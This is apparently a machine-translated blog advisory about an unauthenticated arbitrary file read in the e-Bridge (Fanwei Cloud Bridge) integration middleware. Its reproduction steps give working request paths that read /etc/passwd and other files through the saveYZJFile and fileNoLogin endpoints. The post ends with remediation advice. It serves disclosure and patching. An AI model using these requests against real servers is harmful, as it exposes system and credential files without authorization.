0x00 vulnerability description
E-Bridge is a system integration middleware developed by Shanghai e-Bridge under the background of "Internet+" to bridge open Internet resources and enterprise information systems. Fanwei Cloud Bridge has an arbitrary file reading vulnerability. Attackers can successfully use this vulnerability to read arbitrary files and obtain sensitive information.
0x01 Affected version
2018-2019 multiple versions.
0x02 Vulnerability recurrence
The first step: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt, there is an id string in the returned package
Step 2: Get the file content by id value (/file/fileNoLogin/id)
1. Use /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt, and find that there is no file or directory in the return prompt. Through Linux, it is case sensitive, and it is judged that the target uses the linux system
2. Use /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt and find that the returned package contains id
3. Access /file/fileNoLogin/id through the view file interface
4. When the downloadUrl parameter fills in the absolute path of the directory, it can cause directory traversal
0x03 repair suggestion
1. Close the program routing /file/fileNoLogin
2. Upgrade to the latest version
Please indicate: Adminxe's Blog » Panwei OA Cloud Bridge does not authorize any file reading